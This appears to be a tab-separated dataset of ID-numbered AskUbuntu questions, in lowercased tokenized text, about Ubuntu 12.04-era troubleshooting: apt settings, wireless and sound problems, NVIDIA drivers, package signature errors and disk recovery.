179060	how not to install recommended and suggested packages ?	i use ubuntu 12.04 64-bit , i did the following , sudo gedit /etc/apt/apt.conf and added apt : :install-recommends `` false '' ; apt : :install-suggests `` false '' ; but did not work . when i try to install a package , it still wants to install the packages suggested and recommended . how i can solve this ?
179061	ubuntu one - nautilus integration	i 've uninstalled ubuntu one from my system ( ubuntu 12.04 ) but i still get the ubuntu one right click menu item ( share , get link , etc ) and the folders i used to sync still show ubuntu one 's icons ( synced , syncing , etc ) these issues happening in nautilus . is there any way to get rid of this integration ?
179067	wireless connection drops then password rejected on 12.04	i 'm using an acer aspire 7520 , with a ar242x / ar542x wireless network adapter with a clean install of 12.04 from disk . on bootup my wireless connection works automatically , for a while . then after about 10/20 minutes of use , the connection drops , and when it attempts to reconnect it repeatedly asks me for the wireless password . as the password is pre-entered i click connect , and wait a minute or so while it attempts to connect , then it asks again , as if the router has n't accepted the password this time . if i reboot , it connects no problem ... for while then the process repeats . i tried adding blacklist acer_wmi to /etc/modprobe.d/blacklist.conf , but this had no effect . anyone got any suggestions ? { edit } /var/log/syslog shows : ath5k phy0 : gain calibration timeout ( 2467mhz ) there 's a bunch of lines like this . anyone got a clue what that means ?
179071	add cron job to foreground	i am trying to run a program that pops up a graphical notice to me . as a simple example , i have my cron settings as @ hourly xlogo and if i launch xlogo from an interactive command , it works fine . however , when run by cron , the xlogo window never launches . how can i get cron to let xlogo launch a window , or is it just fundamentally not designed to do that ?
179072	is any version of ubuntu compatible with lenovo r60 ?	i have a legacy lenovo r60 laptop running an intel core solo t3100 ( 1.67mhz ) processor currently running windows xp ( 192mb ram / 40gb hdd ) . my goal is to try and run ubuntu on it using a pen-drive , so that machine response is faster and i can free up some space on it for other purposes . would any particular version of ubuntu only , work ? i would love any tips that a linux noob can use , and a link to the exact version of ubuntu to be downloaded would be really appreciated !
179073	software center crashes ; fieldrunners need to be reinstalled ; ca n't find achive	could not initialize the package information . an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : the package fieldrunners needs to be reinstalled , but i ca n't find an archive for it . ' this is preventing me from opening software center and installing/uninstalling just about everything . how do i remove this fieldrunners or replace said missing archive ? an error occurred , please run package manager from the right-click menu or the apt-get in terminal to see what is wrong . the error message was ' < type ' exception.systemerror ' > ' ( e : the package fieldrunners needs to be reinstalled , but i ca n't find an archive for it. ) ' . this usually means that your installed packages have unmet dependencies
179076	how do i make the headphone jack on my desktop mac work ?	i can plug headphones into the headphone jack , run alsamixer and see that i 've just got 00 instead of m meaning the headphone jack is not muted . but no sound comes out .
179078	what is the best way to image ubuntu for multiple computers ?	what is the best way to image one ubuntu install for multiple computers ?
179094	ubuntu 10.10 can not get nvidia driver 260.19.12 ?	i have ubuntu 10.10 on lenovo w520 with nvidia quadro 1000m and intel integrated graphics cards . the following code only gets 260.19.06 rather than 260.19.12 , the newer version is required for bumblebbe problem installing bumblebee on ubuntu 10.10 sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update & & sudo apt-get install nvidia-current does anyone know why ? thanks .
179095	some thumbnail previews not displaying	i 'm running 12.04 and have noticed that the only thing that displays a thumbnail preview are image files and not video files or anything else . it 's the video files portion that irks me the most . i already have thumbnail preview turned on in display settings as well for all files , nothing helps . thanks in advance ! ! !
179099	hindi keyboard not working properly in ubuntu	i saw and followed the instructions in this post , but the hindi did n't work properly , both in case of keyboard app ( layout settings ) and ibus . here 's the problem ( people who know hindi will be in position to answer it ) : suppose i want to write my name ie udayan - it start with the उ ( spelt as 'u ' ) but when i press u for writing उ what appears is ु ( my name appears ुदायान ) . similar is the case with starting words with अ , इ , ई , ऊ but आ works ( eg . आसम for asam ) . using the matras however , works fine : ie say k+u = कु ( where 'u ' is the matra ) . refer to this document for help .
179102	dell inspiron 15r 5520 wireless device not detected	i bought a dell inspiron 5520 15r last week and i am a newbie in ubuntu platform . i installed windows 7 as well as ubuntu 12.04 64-bit . but my wireless device is not detected in ubuntu while it is working fine in windows os . my wireless device is dell wireless 1704 802.11b 2.4ghz . is this a compatibility problem with ubuntu . what would be the solution ? do i need to install another version of ubuntu ?
179103	acer v3-771 touchpad detected as ps/2 generic mouse	i have a brand new acer v3-771g . i can use my touchpad fine but i ca n't scroll with it , because its detected as a ps/2 generic mouse : xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ video bus id=10 [ slave keyboard ( 3 ) ] ↳ hd webcam id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=15 [ slave keyboard ( 3 ) ] apparently my touchpad is detected as a ps/2 generic mouse . is there a way to fix this ? i tested this with 12.04 , 12.10 alpha , and with several daily mainline kernels but still it does not work .
179104	cpu usage problem	a few days ago i bought a notebook ( asus n56vz ) and detect a problem with cpu usage . when i am surfing on the internet or using some programs , cpu usage is jumping from 1-7 % to 65-80 % . can you give me some advice ?
179106	how can i find corrupted characters in a text file ?	how can i find the line of corrupted characters ( like � , ãÿ , ã¸ ... ) in text files ? ( a list of corrupted characters is here )
179109	what tools can i use to a text overlay to a video ?	i have an mp4 that i uploaded from my android to my ubuntu workstation for editing . what tools can i use on ubuntu to fade in and out professional-looking text ?
179113	change keyboard layout in flash	the controls in the binding of isaac demo are not configurable , and are set to the standard wasd for movement . i 'm using the `` english ( dvorak alternative international no dead keys ) '' keyboard layout by default , but i 'm quite happy to change it for a gaming session . this normally works just fine , but the flash application seems not to notice - no matter which keyboard layout i use ( in firefox and chromium ) it reacts as if dvorak was still in effect . is there some way to temporarily enable a qwerty keyboard layout temporarily for in-browser flash applications ? that is , without changing the default layout , and preferably without any big interventions like rebooting or installing extra software .
179115	ca n't revert to the previous state of graphic experience	this might seem so similar to many other posts regarding nvidia optimus graphic cards troubles and the pain it inflicts on its linux users but my question is actually simply how to go back to my last graphical settings rather than how to make my nvidia vga work . after facing a complete misery by trying out bumblebee on my 12.04 machine and having to change my entire os , i again dared to try it out this time with version 3.0 . everything was working great , i enabled my nvidia vga from bios and installed bumblebee-nvidia . firstly following the official instructions and then not finding it explanatory enough followed this page guides . in short not surprisingly it did n't work with errors like : bumblebee service is not running and graphic module ca n't be found but it also left me with a glitchy graphic experience . ( as an example hovering the mouse over menu items leaves a trace and highlighting texts specially in bash causes the highlights to overlap creating a mess ) so i reversed every single thing i had done to go back to where i started . un-installing all the installed packages including bumblebee , nvidia drivers and anything else i had installed according to the guides and in the end disabled my nvidia again from the bios . but the buggy , glitchy , laggy graphic is still with me . i even disabled the open source intel driver , rebooted and still no success . i am out of ideas . so my question , above if anyone knows a comprehensive elaborated guide on how to install bumblebee specifically on 12.04 for nvidia and if someone can guess what i have done wrong depriving myself from having a dual vga experience is : how to revert my graphic settings to its initial state before the adventure began ? is n't there a sort of system restore command just like in windows to go back in time regardless of what you have done ? ps : it could be worthy to mention that before i did n't have any proprietary drivers installed according to the additional drivers control panel but now i have all sorts of open source items there like driver for bluetooth , mac_hid , realtec sound card , lpc interface , intel graphics ( which i tried disabling but no change ) , intel temperature monitor , hda driver , usb , etc . it 's weird how i did n't need any of these and everything was working perfectly but now all of them showed up there . it would be nice if someone could explain this as well i just ca n't afford reinstalling ubuntu again . please help . this is the content of xorg.0.log : http : //dl.dropbox.com/u/21796054/xorg.0.log and this is the status of the dpkg : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==========================================-==========================================-==================================================================================================== ii libgl1-mesa-glx 8.1~git20120821.1cb07bd3-0ubuntu0sarvatt~p free implementation of the opengl api -- glx runtime un nvidia-current < none > ( no description available ) /usr/lib/xorg : total 112 drwxr-xr-x 3 root root 4096 aug 22 15:11 . drwxr-xr-x 288 root root 69632 aug 23 13:53 .. drwxr-xr-x 6 root root 4096 aug 23 14:54 modules -rw-r -- r -- 1 root root 31246 jul 9 20:24 protocol.txt /usr/lib/xorg/modules/ : total 1160 drwxr-xr-x 6 root root 4096 aug 23 14:54 . drwxr-xr-x 3 root root 4096 aug 22 15:11 .. drwxr-xr-x 2 root root 4096 aug 22 21:00 drivers drwxr-xr-x 2 root root 4096 aug 23 14:54 extensions drwxr-xr-x 2 root root 4096 aug 22 15:13 input -rw-r -- r -- 1 root root 96840 jul 9 20:25 libexa.so -rw-r -- r -- 1 root root 18624 jul 9 20:25 libfbdevhw.so -rw-r -- r -- 1 root root 142280 jul 9 20:25 libfb.so -rw-r -- r -- 1 root root 146080 jul 9 20:25 libint10.so -rw-r -- r -- 1 root root 35152 jul 9 20:25 libshadowfb.so -rw-r -- r -- 1 root root 26784 jul 9 20:25 libshadow.so -rw-r -- r -- 1 root root 26952 jul 9 20:25 libvbe.so -rw-r -- r -- 1 root root 31736 jul 9 20:25 libvgahw.so -rw-r -- r -- 1 root root 187304 jul 9 20:25 libwfb.so -rw-r -- r -- 1 root root 437408 jul 9 20:25 libxaa.so drwxr-xr-x 2 root root 4096 aug 23 14:54 multimedia
179117	can not update using update manager because âpackage operation failedâ	i have 390 updates after opening up 32 bit through vm ware fusion . when tried to update , i got `` package operation failed '' error and i ca n't even open up .run to install the application . here are the details : installarchives ( ) failed : e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb e : prior errors apply to /var/cache/apt/archives/perl_5.14.2-6ubuntu2.1_i386.deb e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/libperl5.14_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-base_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-modules_5.14.2-6ubuntu2.1_all.deb e : prior errors apply to /var/cache/apt/archives/libapt-pkg4.12_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/apt_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.3_i386.deb e : prior errors apply to /var/cache/apt/archives/sysvinit-utils_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/sysv-rc_2.88dsf-13.10ubuntu11.1_all.deb e : prior errors apply to /var/cache/apt/archives/initscripts_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libudev0_175-0ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/upstart_1.5-0ubuntu7_i386.deb e : prior errors apply to /var/cache/apt/archives/cron_3.0pl1-120ubuntu4_i386.deb e : prior errors apply to /var/cache/apt/archives/libapt-inst1.4_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libsqlite3-0_3.7.9-2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/ntpdate_1 % % 3a4.2.6.p3+dfsg-1ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/resolvconf_1.63ubuntu15_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-data_2.32.3-0ubuntu1_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-bin_2.32.3-0ubuntu1_i386.deb e : prior errors apply to /var/cache/apt/archives/gnome-control-center-data_1 % % 3a3.4.2-0ubuntu0.4_all.deb e : prior errors apply to /var/cache/apt/archives/libexpat1_2.0.1-7.2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libfontconfig1_2.8.0-3ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/fontconfig-config_2.8.0-3ubuntu9.1_all.deb e : prior errors apply to /var/cache/apt/archives/libcairo2_1.10.2-6.1ubuntu3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgcrypt11_1.5.0-3ubuntu0.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libtasn1-3_2.10-1ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libgnutls26_2.12.14-5ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libk5crypto3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgssapi-krb5-2_1.10+dfsg~beta1-2ubuntu0.3_i386.deb debconf : apt-extracttemplates failed : illegal seek extracting templates from packages : 7 % % extracting templates from packages : 15 % % extracting templates from packages : 23 % % extracting templates from packages : 30 % % extracting templates from packages : 38 % % extracting templates from packages : 46 % % extracting templates from packages : 53 % % extracting templates from packages : 61 % % extracting templates from packages : 69 % % extracting templates from packages : 76 % % extracting templates from packages : 84 % % extracting templates from packages : 92 % % extracting templates from packages : 100 % % preconfiguring packages ... e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb e : prior errors apply to /var/cache/apt/archives/perl_5.14.2-6ubuntu2.1_i386.deb e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/libperl5.14_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-base_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-modules_5.14.2-6ubuntu2.1_all.deb e : prior errors apply to /var/cache/apt/archives/libapt-pkg4.12_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/apt_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.3_i386.deb e : prior errors apply to /var/cache/apt/archives/sysvinit-utils_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/sysv-rc_2.88dsf-13.10ubuntu11.1_all.deb e : prior errors apply to /var/cache/apt/archives/initscripts_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libudev0_175-0ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/upstart_1.5-0ubuntu7_i386.deb e : prior errors apply to /var/cache/apt/archives/cron_3.0pl1-120ubuntu4_i386.deb e : prior errors apply to /var/cache/apt/archives/libapt-inst1.4_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libsqlite3-0_3.7.9-2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/ntpdate_1 % % 3a4.2.6.p3+dfsg-1ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/resolvconf_1.63ubuntu15_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-data_2.32.3-0ubuntu1_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-bin_2.32.3-0ubuntu1_i386.deb e : prior errors apply to /var/cache/apt/archives/gnome-control-center-data_1 % % 3a3.4.2-0ubuntu0.4_all.deb e : prior errors apply to /var/cache/apt/archives/libexpat1_2.0.1-7.2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libfontconfig1_2.8.0-3ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/fontconfig-config_2.8.0-3ubuntu9.1_all.deb e : prior errors apply to /var/cache/apt/archives/libcairo2_1.10.2-6.1ubuntu3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgcrypt11_1.5.0-3ubuntu0.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libtasn1-3_2.10-1ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libgnutls26_2.12.14-5ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libk5crypto3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgssapi-krb5-2_1.10+dfsg~beta1-2ubuntu0.3_i386.deb debconf : apt-extracttemplates failed : illegal seek extracting templates from packages : 7 % % extracting templates from packages : 15 % % extracting templates from packages : 23 % % extracting templates from packages : 30 % % extracting templates from packages : 38 % % extracting templates from packages : 46 % % extracting templates from packages : 53 % % extracting templates from packages : 61 % % extracting templates from packages : 69 % % extracting templates from packages : 76 % % extracting templates from packages : 84 % % extracting templates from packages : 92 % % extracting templates from packages : 100 % % preconfiguring packages ... e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb e : prior errors apply to /var/cache/apt/archives/perl_5.14.2-6ubuntu2.1_i386.deb e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/libperl5.14_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-base_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-modules_5.14.2-6ubuntu2.1_all.deb e : prior errors apply to /var/cache/apt/archives/libapt-pkg4.12_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/apt_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.3_i386.deb e : prior errors apply to /var/cache/apt/archives/sysvinit-utils_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/sysv-rc_2.88dsf-13.10ubuntu11.1_all.deb e : prior errors apply to /var/cache/apt/archives/initscripts_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libudev0_175-0ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/upstart_1.5-0ubuntu7_i386.deb e : prior errors apply to /var/cache/apt/archives/cron_3.0pl1-120ubuntu4_i386.deb e : prior errors apply to /var/cache/apt/archives/libapt-inst1.4_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libsqlite3-0_3.7.9-2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/ntpdate_1 % % 3a4.2.6.p3+dfsg-1ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/resolvconf_1.63ubuntu15_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-data_2.32.3-0ubuntu1_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-bin_2.32.3-0ubuntu1_i386.deb e : prior errors apply to /var/cache/apt/archives/gnome-control-center-data_1 % % 3a3.4.2-0ubuntu0.4_all.deb e : prior errors apply to /var/cache/apt/archives/libexpat1_2.0.1-7.2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libfontconfig1_2.8.0-3ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/fontconfig-config_2.8.0-3ubuntu9.1_all.deb e : prior errors apply to /var/cache/apt/archives/libcairo2_1.10.2-6.1ubuntu3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgcrypt11_1.5.0-3ubuntu0.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libtasn1-3_2.10-1ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libgnutls26_2.12.14-5ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libk5crypto3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgssapi-krb5-2_1.10+dfsg~beta1-2ubuntu0.3_i386.deb debconf : apt-extracttemplates failed : illegal seek extracting templates from packages : 7 % % extracting templates from packages : 15 % % extracting templates from packages : 23 % % extracting templates from packages : 30 % % extracting templates from packages : 38 % % extracting templates from packages : 46 % % extracting templates from packages : 53 % % extracting templates from packages : 61 % % extracting templates from packages : 69 % % extracting templates from packages : 76 % % extracting templates from packages : 84 % % extracting templates from packages : 92 % % extracting templates from packages : 100 % % preconfiguring packages ... e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb e : prior errors apply to /var/cache/apt/archives/perl_5.14.2-6ubuntu2.1_i386.deb e : invalid archive signature e : prior errors apply to /var/cache/apt/archives/libperl5.14_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-base_5.14.2-6ubuntu2.1_i386.deb e : prior errors apply to /var/cache/apt/archives/perl-modules_5.14.2-6ubuntu2.1_all.deb e : prior errors apply to /var/cache/apt/archives/libapt-pkg4.12_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/apt_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libssl1.0.0_1.0.1-4ubuntu5.3_i386.deb e : prior errors apply to /var/cache/apt/archives/sysvinit-utils_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/sysv-rc_2.88dsf-13.10ubuntu11.1_all.deb e : prior errors apply to /var/cache/apt/archives/initscripts_2.88dsf-13.10ubuntu11.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libudev0_175-0ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/upstart_1.5-0ubuntu7_i386.deb e : prior errors apply to /var/cache/apt/archives/cron_3.0pl1-120ubuntu4_i386.deb e : prior errors apply to /var/cache/apt/archives/libapt-inst1.4_0.8.16~exp12ubuntu10.2_i386.deb e : prior errors apply to /var/cache/apt/archives/libsqlite3-0_3.7.9-2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/ntpdate_1 % % 3a4.2.6.p3+dfsg-1ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/resolvconf_1.63ubuntu15_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-data_2.32.3-0ubuntu1_all.deb e : prior errors apply to /var/cache/apt/archives/libglib2.0-bin_2.32.3-0ubuntu1_i386.deb e : prior errors apply to /var/cache/apt/archives/gnome-control-center-data_1 % % 3a3.4.2-0ubuntu0.4_all.deb e : prior errors apply to /var/cache/apt/archives/libexpat1_2.0.1-7.2ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libfontconfig1_2.8.0-3ubuntu9.1_i386.deb e : prior errors apply to /var/cache/apt/archives/fontconfig-config_2.8.0-3ubuntu9.1_all.deb e : prior errors apply to /var/cache/apt/archives/libcairo2_1.10.2-6.1ubuntu3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgcrypt11_1.5.0-3ubuntu0.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libtasn1-3_2.10-1ubuntu1.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libgnutls26_2.12.14-5ubuntu3.1_i386.deb e : prior errors apply to /var/cache/apt/archives/libk5crypto3_1.10+dfsg~beta1-2ubuntu0.3_i386.deb e : prior errors apply to /var/cache/apt/archives/libgssapi-krb5-2_1.10+dfsg~beta1-2ubuntu0.3_i386.deb debconf : apt-extracttemplates failed : illegal seek extracting templates from packages : 7 % % extracting templates from packages : 15 % % extracting templates from packages : 23 % % extracting templates from packages : 30 % % extracting templates from packages : 38 % % extracting templates from packages : 46 % % extracting templates from packages : 53 % % extracting templates from packages : 61 % % extracting templates from packages : 69 % % extracting templates from packages : 76 % % extracting templates from packages : 84 % % extracting templates from packages : 92 % % extracting templates from packages : 100 % % preconfiguring packages ... dpkg-deb : error : `/var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb ' is not a debian format archive dpkg : error processing /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb ( -- unpack ) : subprocess dpkg-deb -- control returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/base-files_6.5ubuntu6.2_i386.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 )
179119	hosting my own cloud ide like cloud9	hi i have a headless ubuntu server and would like to install some sort of cloud9 like ide - any suggestions with instructions ? code highlighting and hinting would be excellent . this is for mainly php development .
179133	is swap used for low priority programs ?	i have a p2p number crunching program that was written for windows but is written in java . it sits in the background of the computer using your spare ram as a low priority program . when your computer requires more ram , this program lets go of some . does this program tap into my swap ?
179134	alsamixer missing controls after upgrade from 10.04 to 12.04	we previously loaded ubuntu 10.04 on our q7 intel platform + custom hardware that uses the intel hda sound card . sound worked well . we changed to 12.04 yesterday and have output ( speaker ) sound , but no `` line '' input sound . interestingly , alsamixer is now missing the control labeled `` digital '' under 10.04 . there is a new spdif control present in 12.04 but it has neither mute nor sliders ; it 's just there . another interesting tidbit , if it helps , the sound test built into the sound control will play `` left front '' , but not `` right front '' , even though the stereo outputs are connected together and tied to one speaker . i have already done a alsactl init followed by a reboot . here is the current output of amixer . simple mixer control 'master',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 217 [ 85 % ] [ -7.60db ] front right : playback 217 [ 85 % ] [ -7.60db ] simple mixer control 'line',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ] simple mixer control 'iec958',0 capabilities : cswitch cswitch-joined penum capture channels : mono mono : capture [ on ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 16 [ 52 % ] [ 12.00db ] [ on ] front right : capture 16 [ 52 % ] [ 12.00db ] [ on ] simple mixer control 'capture',1 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 0 [ 0 % ] [ -12.00db ] [ on ] front right : capture 0 [ 0 % ] [ -12.00db ] [ on ] simple mixer control 'capture',2 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 3 [ 10 % ] [ -7.50db ] [ on ] front right : capture 3 [ 10 % ] [ -7.50db ] [ on ] simple mixer control 'input source',0 capabilities : cenum items : 'mic ' 'line' item0 : 'line' simple mixer control 'input source',1 capabilities : cenum items : 'mic ' 'line' item0 : 'mic' simple mixer control 'input source',2 capabilities : cenum items : 'mic ' 'line' item0 : 'mic' suggestions anyone ?
179136	how do i put two windows side by side 12.04	i recently ran updates in 12.04 . i ca n't seem to tile windows side by side . before i would grab the title bar of the window and move the window to the right . it then would be resized to half the screen size . i would then take the next window and do the same thing on the opposite side . now , i ca n't seem to do that anymore . anyone know why ?
179138	how to access internal hard drive from ubuntu live usb ?	i 'm running ubuntu 12.04 off my usb drive at the moment because my hard drive has no os and wo n't allow windows 7 to install on my internal hard drive . here 's the low down though : i was trying to install windows 7 on my laptop and kept getting an error which forced me to open diskpart up . i had two partitions 60gb and 220gb . all my stuff was saved on my 220gb hard drive and i wanted to install my os on the 60gb hard drive , but i cleaned disk 0 on diskpart and now its all unallocated space with no partitions . i 'm hoping it did n't format the drive seeing as the clean was done in a split second . so i have no os and i booted ubuntu 12.04 and i 'm now trying to access the internal hard drive but it wo n't show up in the terminal when i type df -h. any help would be appreciated .
179141	problem with internet connection	i have windows vista and 12.04 on my dell d630 laptop . i 'm using huawei mt882 modem . i have installed ubuntu two days ago using wubi . i have tried with usb or adsl cable but on ubuntu , internet connection wo n't work . on windows however , it works perfectly ( both usb and adsl cable ) . is there any way to fix this problem ? output of ifconfig : eth0 link encap : ethernet hwaddr 00:1c:23:0c : c5 : cc up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 eth1 link encap : ethernet hwaddr 00:1b:9e : bc:0d : da inet6 addr : fe80 : :21b:9eff : febc : dda/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:557 ( 557.0 b ) tx bytes:5862 ( 5.8 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:704 errors:0 dropped:0 overruns:0 frame:0 tx packets:704 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:56736 ( 56.7 kb ) tx bytes:56736 ( 56.7 kb ) and output of nmcli dev : eth1 802-3-ethernet connecting ( getting ip configuration ) eth0 802-3-ethernet unavailable wlan0 802-11-wireless unavailable
